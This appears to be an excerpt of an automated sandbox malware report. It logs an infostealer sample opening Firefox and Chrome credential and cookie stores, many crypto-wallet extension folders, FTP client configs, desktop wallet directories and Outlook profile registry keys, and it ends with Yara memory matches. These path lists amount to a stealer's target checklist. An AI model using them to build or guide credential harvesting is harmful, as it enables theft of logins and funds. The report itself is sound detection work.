Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB

Source: Yara match	File source: 13.3.n4e23hz.exe.6f623b8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.n4e23hz.exe.6f623b8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000003.2778454401.000000000145F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2714140999.0000000001331000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.3096951530.0000000006E6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2665848570.0000000001333000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2714429122.0000000001333000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2124461311.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.2911591776.0000000001480000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2690163685.000000000132F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.2970106725.0000000001480000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.2991550390.0000000001491000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2663222028.000000000132F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2688903323.000000000132F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.2875167398.000000000148E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2664605570.0000000001333000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.2875015160.0000000001481000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2738907476.0000000001331000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.2940878588.0000000001483000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2748805077.000000000134D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
